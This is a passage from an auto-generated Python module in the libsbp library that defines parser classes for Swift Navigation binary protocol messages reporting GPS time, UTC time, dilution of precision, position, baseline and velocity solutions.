adammacudzinski/libsbp
|
33f82210ff1262f8d6c180215277a0bb5eb3b65c
|
[
"MIT"
] | null | null | null |
python/sbp/jit/navigation.py
|
adammacudzinski/libsbp
|
33f82210ff1262f8d6c180215277a0bb5eb3b65c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# Copyright (C) 2015-2018 Swift Navigation Inc.
# Contact: https://support.swiftnav.com
#
# This source is subject to the license found in the file 'LICENSE' which must
# be be distributed together with this source. All other rights reserved.
#
# THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR PURPOSE.
"""
Geodetic navigation messages reporting GPS time, position, velocity,
and baseline position solutions. For position solutions, these
messages define several different position solutions: single-point
(SPP), RTK, and pseudo-absolute position solutions.
The SPP is the standalone, absolute GPS position solution using only
a single receiver. The RTK solution is the differential GPS
solution, which can use either a fixed/integer or floating carrier
phase ambiguity. The pseudo-absolute position solution uses a
user-provided, well-surveyed base station position (if available)
and the RTK solution in tandem.
When the inertial navigation mode indicates that the IMU is used,
all messages are reported in the vehicle body frame as defined by
device settings. By default, the vehicle body frame is configured to be
coincident with the antenna phase center. When there is no inertial
navigation, the solution will be reported at the phase center of the antenna.
There is no inertial navigation capability on Piksi Multi or Duro.
The tow field, when valid, is most often the Time of Measurement. When this
is the case, the 5th bit of flags is set to the default value of 0.
When this is not the case, the tow may be a time of arrival or a local
system timestamp, irrespective of the time reference (GPS Week or else),
but not a Time of Measurement.
"""
import json
import numpy as np
from sbp.jit.msg import SBP, SENDER_ID
from sbp.jit.msg import get_u8, get_u16, get_u32, get_u64
from sbp.jit.msg import get_s8, get_s16, get_s32, get_s64
from sbp.jit.msg import get_f32, get_f64, judicious_round
from sbp.jit.msg import get_string, get_fixed_string, get_setting
from sbp.jit.msg import get_array, get_fixed_array
# Automatically generated from piksi/yaml/swiftnav/sbp/navigation.yaml with generate.py.
# Please do not hand edit!
SBP_MSG_GPS_TIME = 0x0102
class MsgGPSTime(SBP):
"""SBP class for message MSG_GPS_TIME (0x0102).
You can have MSG_GPS_TIME inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the GPS time, representing the time since
the GPS epoch began on midnight January 6, 1980 UTC. GPS time
counts the weeks and seconds of the week. The weeks begin at the
Saturday/Sunday transition. GPS week 0 began at the beginning of
the GPS time scale.
Within each week number, the GPS time of the week is between
between 0 and 604800 seconds (=60*60*24*7). Note that GPS time
does not accumulate leap seconds, and as of now, has a small
offset from UTC. In a message stream, this message precedes a
set of other navigation messages referenced to the same time
(but lacking the ns field) and indicates a more precise time of
these messages.
"""
__slots__ = ['wn',
'tow',
'ns_residual',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__wn, offset, length) = get_u16(buf, offset, length)
ret['wn'] = __wn
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__ns_residual, offset, length) = get_s32(buf, offset, length)
ret['ns_residual'] = __ns_residual
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.wn = res['wn']
self.tow = res['tow']
self.ns_residual = res['ns_residual']
self.flags = res['flags']
return res, off, length
SBP_MSG_GPS_TIME_GNSS = 0x0104
class MsgGPSTimeGnss(SBP):
"""SBP class for message MSG_GPS_TIME_GNSS (0x0104).
You can have MSG_GPS_TIME_GNSS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the GPS time, representing the time since
the GPS epoch began on midnight January 6, 1980 UTC. GPS time
counts the weeks and seconds of the week. The weeks begin at the
Saturday/Sunday transition. GPS week 0 began at the beginning of
the GPS time scale.
Within each week number, the GPS time of the week is between
between 0 and 604800 seconds (=60*60*24*7). Note that GPS time
does not accumulate leap seconds, and as of now, has a small
offset from UTC. In a message stream, this message precedes a
set of other navigation messages referenced to the same time
(but lacking the ns field) and indicates a more precise time of
these messages.
"""
__slots__ = ['wn',
'tow',
'ns_residual',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__wn, offset, length) = get_u16(buf, offset, length)
ret['wn'] = __wn
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__ns_residual, offset, length) = get_s32(buf, offset, length)
ret['ns_residual'] = __ns_residual
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.wn = res['wn']
self.tow = res['tow']
self.ns_residual = res['ns_residual']
self.flags = res['flags']
return res, off, length
SBP_MSG_UTC_TIME = 0x0103
class MsgUtcTime(SBP):
"""SBP class for message MSG_UTC_TIME (0x0103).
You can have MSG_UTC_TIME inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the Universal Coordinated Time (UTC). Note the flags
which indicate the source of the UTC offset value and source of the time fix.
"""
__slots__ = ['flags',
'tow',
'year',
'month',
'day',
'hours',
'minutes',
'seconds',
'ns',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__year, offset, length) = get_u16(buf, offset, length)
ret['year'] = __year
(__month, offset, length) = get_u8(buf, offset, length)
ret['month'] = __month
(__day, offset, length) = get_u8(buf, offset, length)
ret['day'] = __day
(__hours, offset, length) = get_u8(buf, offset, length)
ret['hours'] = __hours
(__minutes, offset, length) = get_u8(buf, offset, length)
ret['minutes'] = __minutes
(__seconds, offset, length) = get_u8(buf, offset, length)
ret['seconds'] = __seconds
(__ns, offset, length) = get_u32(buf, offset, length)
ret['ns'] = __ns
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.flags = res['flags']
self.tow = res['tow']
self.year = res['year']
self.month = res['month']
self.day = res['day']
self.hours = res['hours']
self.minutes = res['minutes']
self.seconds = res['seconds']
self.ns = res['ns']
return res, off, length
SBP_MSG_UTC_TIME_GNSS = 0x0105
class MsgUtcTimeGnss(SBP):
"""SBP class for message MSG_UTC_TIME_GNSS (0x0105).
You can have MSG_UTC_TIME_GNSS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the Universal Coordinated Time (UTC). Note the flags
which indicate the source of the UTC offset value and source of the time fix.
"""
__slots__ = ['flags',
'tow',
'year',
'month',
'day',
'hours',
'minutes',
'seconds',
'ns',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__year, offset, length) = get_u16(buf, offset, length)
ret['year'] = __year
(__month, offset, length) = get_u8(buf, offset, length)
ret['month'] = __month
(__day, offset, length) = get_u8(buf, offset, length)
ret['day'] = __day
(__hours, offset, length) = get_u8(buf, offset, length)
ret['hours'] = __hours
(__minutes, offset, length) = get_u8(buf, offset, length)
ret['minutes'] = __minutes
(__seconds, offset, length) = get_u8(buf, offset, length)
ret['seconds'] = __seconds
(__ns, offset, length) = get_u32(buf, offset, length)
ret['ns'] = __ns
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.flags = res['flags']
self.tow = res['tow']
self.year = res['year']
self.month = res['month']
self.day = res['day']
self.hours = res['hours']
self.minutes = res['minutes']
self.seconds = res['seconds']
self.ns = res['ns']
return res, off, length
SBP_MSG_DOPS = 0x0208
class MsgDops(SBP):
"""SBP class for message MSG_DOPS (0x0208).
You can have MSG_DOPS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This dilution of precision (DOP) message describes the effect of
navigation satellite geometry on positional measurement
precision. The flags field indicated whether the DOP reported
corresponds to differential or SPP solution.
"""
__slots__ = ['tow',
'gdop',
'pdop',
'tdop',
'hdop',
'vdop',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__gdop, offset, length) = get_u16(buf, offset, length)
ret['gdop'] = __gdop
(__pdop, offset, length) = get_u16(buf, offset, length)
ret['pdop'] = __pdop
(__tdop, offset, length) = get_u16(buf, offset, length)
ret['tdop'] = __tdop
(__hdop, offset, length) = get_u16(buf, offset, length)
ret['hdop'] = __hdop
(__vdop, offset, length) = get_u16(buf, offset, length)
ret['vdop'] = __vdop
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.gdop = res['gdop']
self.pdop = res['pdop']
self.tdop = res['tdop']
self.hdop = res['hdop']
self.vdop = res['vdop']
self.flags = res['flags']
return res, off, length
SBP_MSG_POS_ECEF = 0x0209
class MsgPosECEF(SBP):
"""SBP class for message MSG_POS_ECEF (0x0209).
You can have MSG_POS_ECEF inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The position solution message reports absolute Earth Centered
Earth Fixed (ECEF) coordinates and the status (single point vs
pseudo-absolute RTK) of the position solution. If the rover
receiver knows the surveyed position of the base station and has
an RTK solution, this reports a pseudo-absolute position
solution using the base station position and the rover's RTK
baseline vector. The full GPS time is given by the preceding
MSG_GPS_TIME with the matching time-of-week (tow).
"""
__slots__ = ['tow',
'x',
'y',
'z',
'accuracy',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__x, offset, length) = get_f64(buf, offset, length)
ret['x'] = __x
(__y, offset, length) = get_f64(buf, offset, length)
ret['y'] = __y
(__z, offset, length) = get_f64(buf, offset, length)
ret['z'] = __z
(__accuracy, offset, length) = get_u16(buf, offset, length)
ret['accuracy'] = __accuracy
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.x = res['x']
self.y = res['y']
self.z = res['z']
self.accuracy = res['accuracy']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_POS_ECEF_COV = 0x0214
class MsgPosECEFCov(SBP):
"""SBP class for message MSG_POS_ECEF_COV (0x0214).
You can have MSG_POS_ECEF_COV inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The position solution message reports absolute Earth Centered
Earth Fixed (ECEF) coordinates and the status (single point vs
pseudo-absolute RTK) of the position solution. The message also
reports the upper triangular portion of the 3x3 covariance matrix.
If the receiver knows the surveyed position of the base station and has
an RTK solution, this reports a pseudo-absolute position
solution using the base station position and the rover's RTK
baseline vector. The full GPS time is given by the preceding
MSG_GPS_TIME with the matching time-of-week (tow).
"""
__slots__ = ['tow',
'x',
'y',
'z',
'cov_x_x',
'cov_x_y',
'cov_x_z',
'cov_y_y',
'cov_y_z',
'cov_z_z',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__x, offset, length) = get_f64(buf, offset, length)
ret['x'] = __x
(__y, offset, length) = get_f64(buf, offset, length)
ret['y'] = __y
(__z, offset, length) = get_f64(buf, offset, length)
ret['z'] = __z
(__cov_x_x, offset, length) = get_f32(buf, offset, length)
ret['cov_x_x'] = judicious_round(np.float32(__cov_x_x)) if SBP.judicious_rounding else __cov_x_x
(__cov_x_y, offset, length) = get_f32(buf, offset, length)
ret['cov_x_y'] = judicious_round(np.float32(__cov_x_y)) if SBP.judicious_rounding else __cov_x_y
(__cov_x_z, offset, length) = get_f32(buf, offset, length)
ret['cov_x_z'] = judicious_round(np.float32(__cov_x_z)) if SBP.judicious_rounding else __cov_x_z
(__cov_y_y, offset, length) = get_f32(buf, offset, length)
ret['cov_y_y'] = judicious_round(np.float32(__cov_y_y)) if SBP.judicious_rounding else __cov_y_y
(__cov_y_z, offset, length) = get_f32(buf, offset, length)
ret['cov_y_z'] = judicious_round(np.float32(__cov_y_z)) if SBP.judicious_rounding else __cov_y_z
(__cov_z_z, offset, length) = get_f32(buf, offset, length)
ret['cov_z_z'] = judicious_round(np.float32(__cov_z_z)) if SBP.judicious_rounding else __cov_z_z
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.x = res['x']
self.y = res['y']
self.z = res['z']
self.cov_x_x = res['cov_x_x']
self.cov_x_y = res['cov_x_y']
self.cov_x_z = res['cov_x_z']
self.cov_y_y = res['cov_y_y']
self.cov_y_z = res['cov_y_z']
self.cov_z_z = res['cov_z_z']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_POS_LLH = 0x020A
class MsgPosLLH(SBP):
"""SBP class for message MSG_POS_LLH (0x020A).
You can have MSG_POS_LLH inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This position solution message reports the absolute geodetic
coordinates and the status (single point vs pseudo-absolute RTK)
of the position solution. If the rover receiver knows the
surveyed position of the base station and has an RTK solution,
this reports a pseudo-absolute position solution using the base
station position and the rover's RTK baseline vector. The full
GPS time is given by the preceding MSG_GPS_TIME with the
matching time-of-week (tow).
"""
__slots__ = ['tow',
'lat',
'lon',
'height',
'h_accuracy',
'v_accuracy',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__lat, offset, length) = get_f64(buf, offset, length)
ret['lat'] = __lat
(__lon, offset, length) = get_f64(buf, offset, length)
ret['lon'] = __lon
(__height, offset, length) = get_f64(buf, offset, length)
ret['height'] = __height
(__h_accuracy, offset, length) = get_u16(buf, offset, length)
ret['h_accuracy'] = __h_accuracy
(__v_accuracy, offset, length) = get_u16(buf, offset, length)
ret['v_accuracy'] = __v_accuracy
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.lat = res['lat']
self.lon = res['lon']
self.height = res['height']
self.h_accuracy = res['h_accuracy']
self.v_accuracy = res['v_accuracy']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_POS_LLH_COV = 0x0211
class MsgPosLLHCov(SBP):
"""SBP class for message MSG_POS_LLH_COV (0x0211).
You can have MSG_POS_LLH_COV inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This position solution message reports the absolute geodetic
coordinates and the status (single point vs pseudo-absolute RTK)
of the position solution as well as the upper triangle of the 3x3
covariance matrix. The position information and Fix Mode flags should
follow the MSG_POS_LLH message. Since the covariance matrix is computed
in the local-level North, East, Down frame, the covariance terms follow
with that convention. Thus, covariances are reported against the "downward"
measurement and care should be taken with the sign convention.
"""
__slots__ = ['tow',
'lat',
'lon',
'height',
'cov_n_n',
'cov_n_e',
'cov_n_d',
'cov_e_e',
'cov_e_d',
'cov_d_d',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__lat, offset, length) = get_f64(buf, offset, length)
ret['lat'] = __lat
(__lon, offset, length) = get_f64(buf, offset, length)
ret['lon'] = __lon
(__height, offset, length) = get_f64(buf, offset, length)
ret['height'] = __height
(__cov_n_n, offset, length) = get_f32(buf, offset, length)
ret['cov_n_n'] = judicious_round(np.float32(__cov_n_n)) if SBP.judicious_rounding else __cov_n_n
(__cov_n_e, offset, length) = get_f32(buf, offset, length)
ret['cov_n_e'] = judicious_round(np.float32(__cov_n_e)) if SBP.judicious_rounding else __cov_n_e
(__cov_n_d, offset, length) = get_f32(buf, offset, length)
ret['cov_n_d'] = judicious_round(np.float32(__cov_n_d)) if SBP.judicious_rounding else __cov_n_d
(__cov_e_e, offset, length) = get_f32(buf, offset, length)
ret['cov_e_e'] = judicious_round(np.float32(__cov_e_e)) if SBP.judicious_rounding else __cov_e_e
(__cov_e_d, offset, length) = get_f32(buf, offset, length)
ret['cov_e_d'] = judicious_round(np.float32(__cov_e_d)) if SBP.judicious_rounding else __cov_e_d
(__cov_d_d, offset, length) = get_f32(buf, offset, length)
ret['cov_d_d'] = judicious_round(np.float32(__cov_d_d)) if SBP.judicious_rounding else __cov_d_d
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.lat = res['lat']
self.lon = res['lon']
self.height = res['height']
self.cov_n_n = res['cov_n_n']
self.cov_n_e = res['cov_n_e']
self.cov_n_d = res['cov_n_d']
self.cov_e_e = res['cov_e_e']
self.cov_e_d = res['cov_e_d']
self.cov_d_d = res['cov_d_d']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_BASELINE_ECEF = 0x020B
class MsgBaselineECEF(SBP):
"""SBP class for message MSG_BASELINE_ECEF (0x020B).
You can have MSG_BASELINE_ECEF inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the baseline solution in Earth Centered
Earth Fixed (ECEF) coordinates. This baseline is the relative
vector distance from the base station to the rover receiver. The
full GPS time is given by the preceding MSG_GPS_TIME with the
matching time-of-week (tow).
"""
__slots__ = ['tow',
'x',
'y',
'z',
'accuracy',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__x, offset, length) = get_s32(buf, offset, length)
ret['x'] = __x
(__y, offset, length) = get_s32(buf, offset, length)
ret['y'] = __y
(__z, offset, length) = get_s32(buf, offset, length)
ret['z'] = __z
(__accuracy, offset, length) = get_u16(buf, offset, length)
ret['accuracy'] = __accuracy
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.x = res['x']
self.y = res['y']
self.z = res['z']
self.accuracy = res['accuracy']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_BASELINE_NED = 0x020C
class MsgBaselineNED(SBP):
"""SBP class for message MSG_BASELINE_NED (0x020C).
You can have MSG_BASELINE_NED inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the baseline solution in North East Down
(NED) coordinates. This baseline is the relative vector distance
from the base station to the rover receiver, and NED coordinate
system is defined at the local WGS84 tangent plane centered at the
base station position. The full GPS time is given by the
preceding MSG_GPS_TIME with the matching time-of-week (tow).
"""
__slots__ = ['tow',
'n',
'e',
'd',
'h_accuracy',
'v_accuracy',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__n, offset, length) = get_s32(buf, offset, length)
ret['n'] = __n
(__e, offset, length) = get_s32(buf, offset, length)
ret['e'] = __e
(__d, offset, length) = get_s32(buf, offset, length)
ret['d'] = __d
(__h_accuracy, offset, length) = get_u16(buf, offset, length)
ret['h_accuracy'] = __h_accuracy
(__v_accuracy, offset, length) = get_u16(buf, offset, length)
ret['v_accuracy'] = __v_accuracy
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.n = res['n']
self.e = res['e']
self.d = res['d']
self.h_accuracy = res['h_accuracy']
self.v_accuracy = res['v_accuracy']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_VEL_ECEF = 0x020D
class MsgVelECEF(SBP):
"""SBP class for message MSG_VEL_ECEF (0x020D).
You can have MSG_VEL_ECEF inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the velocity in Earth Centered Earth Fixed
(ECEF) coordinates. The full GPS time is given by the preceding
MSG_GPS_TIME with the matching time-of-week (tow).
"""
__slots__ = ['tow',
'x',
'y',
'z',
'accuracy',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__x, offset, length) = get_s32(buf, offset, length)
ret['x'] = __x
(__y, offset, length) = get_s32(buf, offset, length)
ret['y'] = __y
(__z, offset, length) = get_s32(buf, offset, length)
ret['z'] = __z
(__accuracy, offset, length) = get_u16(buf, offset, length)
ret['accuracy'] = __accuracy
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.x = res['x']
self.y = res['y']
self.z = res['z']
self.accuracy = res['accuracy']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_VEL_ECEF_COV = 0x0215
class MsgVelECEFCov(SBP):
"""SBP class for message MSG_VEL_ECEF_COV (0x0215).
You can have MSG_VEL_ECEF_COV inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the velocity in Earth Centered Earth Fixed
(ECEF) coordinates. The full GPS time is given by the preceding
MSG_GPS_TIME with the matching time-of-week (tow).
"""
__slots__ = ['tow',
'x',
'y',
'z',
'cov_x_x',
'cov_x_y',
'cov_x_z',
'cov_y_y',
'cov_y_z',
'cov_z_z',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__x, offset, length) = get_s32(buf, offset, length)
ret['x'] = __x
(__y, offset, length) = get_s32(buf, offset, length)
ret['y'] = __y
(__z, offset, length) = get_s32(buf, offset, length)
ret['z'] = __z
(__cov_x_x, offset, length) = get_f32(buf, offset, length)
ret['cov_x_x'] = judicious_round(np.float32(__cov_x_x)) if SBP.judicious_rounding else __cov_x_x
(__cov_x_y, offset, length) = get_f32(buf, offset, length)
ret['cov_x_y'] = judicious_round(np.float32(__cov_x_y)) if SBP.judicious_rounding else __cov_x_y
(__cov_x_z, offset, length) = get_f32(buf, offset, length)
ret['cov_x_z'] = judicious_round(np.float32(__cov_x_z)) if SBP.judicious_rounding else __cov_x_z
(__cov_y_y, offset, length) = get_f32(buf, offset, length)
ret['cov_y_y'] = judicious_round(np.float32(__cov_y_y)) if SBP.judicious_rounding else __cov_y_y
(__cov_y_z, offset, length) = get_f32(buf, offset, length)
ret['cov_y_z'] = judicious_round(np.float32(__cov_y_z)) if SBP.judicious_rounding else __cov_y_z
(__cov_z_z, offset, length) = get_f32(buf, offset, length)
ret['cov_z_z'] = judicious_round(np.float32(__cov_z_z)) if SBP.judicious_rounding else __cov_z_z
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.x = res['x']
self.y = res['y']
self.z = res['z']
self.cov_x_x = res['cov_x_x']
self.cov_x_y = res['cov_x_y']
self.cov_x_z = res['cov_x_z']
self.cov_y_y = res['cov_y_y']
self.cov_y_z = res['cov_y_z']
self.cov_z_z = res['cov_z_z']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_VEL_NED = 0x020E
class MsgVelNED(SBP):
"""SBP class for message MSG_VEL_NED (0x020E).
You can have MSG_VEL_NED inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the velocity in local North East Down (NED)
coordinates. The NED coordinate system is defined as the local WGS84
tangent plane centered at the current position. The full GPS time is
given by the preceding MSG_GPS_TIME with the matching time-of-week (tow).
"""
__slots__ = ['tow',
'n',
'e',
'd',
'h_accuracy',
'v_accuracy',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__n, offset, length) = get_s32(buf, offset, length)
ret['n'] = __n
(__e, offset, length) = get_s32(buf, offset, length)
ret['e'] = __e
(__d, offset, length) = get_s32(buf, offset, length)
ret['d'] = __d
(__h_accuracy, offset, length) = get_u16(buf, offset, length)
ret['h_accuracy'] = __h_accuracy
(__v_accuracy, offset, length) = get_u16(buf, offset, length)
ret['v_accuracy'] = __v_accuracy
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.n = res['n']
self.e = res['e']
self.d = res['d']
self.h_accuracy = res['h_accuracy']
self.v_accuracy = res['v_accuracy']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_VEL_NED_COV = 0x0212
class MsgVelNEDCov(SBP):
"""SBP class for message MSG_VEL_NED_COV (0x0212).
You can have MSG_VEL_NED_COV inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
This message reports the velocity in local North East Down (NED)
coordinates. The NED coordinate system is defined as the local WGS84
tangent plane centered at the current position. The full GPS time is
given by the preceding MSG_GPS_TIME with the matching time-of-week (tow).
This message is similar to the MSG_VEL_NED, but it includes the upper triangular
portion of the 3x3 covariance matrix.
"""
__slots__ = ['tow',
'n',
'e',
'd',
'cov_n_n',
'cov_n_e',
'cov_n_d',
'cov_e_e',
'cov_e_d',
'cov_d_d',
'n_sats',
'flags',
]
@classmethod
def parse_members(cls, buf, offset, length):
ret = {}
(__tow, offset, length) = get_u32(buf, offset, length)
ret['tow'] = __tow
(__n, offset, length) = get_s32(buf, offset, length)
ret['n'] = __n
(__e, offset, length) = get_s32(buf, offset, length)
ret['e'] = __e
(__d, offset, length) = get_s32(buf, offset, length)
ret['d'] = __d
(__cov_n_n, offset, length) = get_f32(buf, offset, length)
ret['cov_n_n'] = judicious_round(np.float32(__cov_n_n)) if SBP.judicious_rounding else __cov_n_n
(__cov_n_e, offset, length) = get_f32(buf, offset, length)
ret['cov_n_e'] = judicious_round(np.float32(__cov_n_e)) if SBP.judicious_rounding else __cov_n_e
(__cov_n_d, offset, length) = get_f32(buf, offset, length)
ret['cov_n_d'] = judicious_round(np.float32(__cov_n_d)) if SBP.judicious_rounding else __cov_n_d
(__cov_e_e, offset, length) = get_f32(buf, offset, length)
ret['cov_e_e'] = judicious_round(np.float32(__cov_e_e)) if SBP.judicious_rounding else __cov_e_e
(__cov_e_d, offset, length) = get_f32(buf, offset, length)
ret['cov_e_d'] = judicious_round(np.float32(__cov_e_d)) if SBP.judicious_rounding else __cov_e_d
(__cov_d_d, offset, length) = get_f32(buf, offset, length)
ret['cov_d_d'] = judicious_round(np.float32(__cov_d_d)) if SBP.judicious_rounding else __cov_d_d
(__n_sats, offset, length) = get_u8(buf, offset, length)
ret['n_sats'] = __n_sats
(__flags, offset, length) = get_u8(buf, offset, length)
ret['flags'] = __flags
return ret, offset, length
def _unpack_members(self, buf, offset, length):
res, off, length = self.parse_members(buf, offset, length)
if off == offset:
return {}, offset, length
self.tow = res['tow']
self.n = res['n']
self.e = res['e']
self.d = res['d']
self.cov_n_n = res['cov_n_n']
self.cov_n_e = res['cov_n_e']
self.cov_n_d = res['cov_n_d']
self.cov_e_e = res['cov_e_e']
self.cov_e_d = res['cov_e_d']
self.cov_d_d = res['cov_d_d']
self.n_sats = res['n_sats']
self.flags = res['flags']
return res, off, length
SBP_MSG_POS_ECEF_GNSS = 0x0229
class MsgPosECEFGnss(SBP):
"""SBP class for message MSG_POS_ECEF_GNSS (0x0229).
You can have MSG_POS_ECEF_GNSS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The position solution message reports absolute Earth Centered
Earth Fixed (ECEF) coordinates and the status (single point vs
pseudo-absolute RTK) of the position solution. If the rover
receiver knows the surveyed position of the base station and has
an RTK solution, this reports a pseudo-absolute position
solution using the base station position and the rover's RTK
baseline vector. The full GPS time is given by the preceding
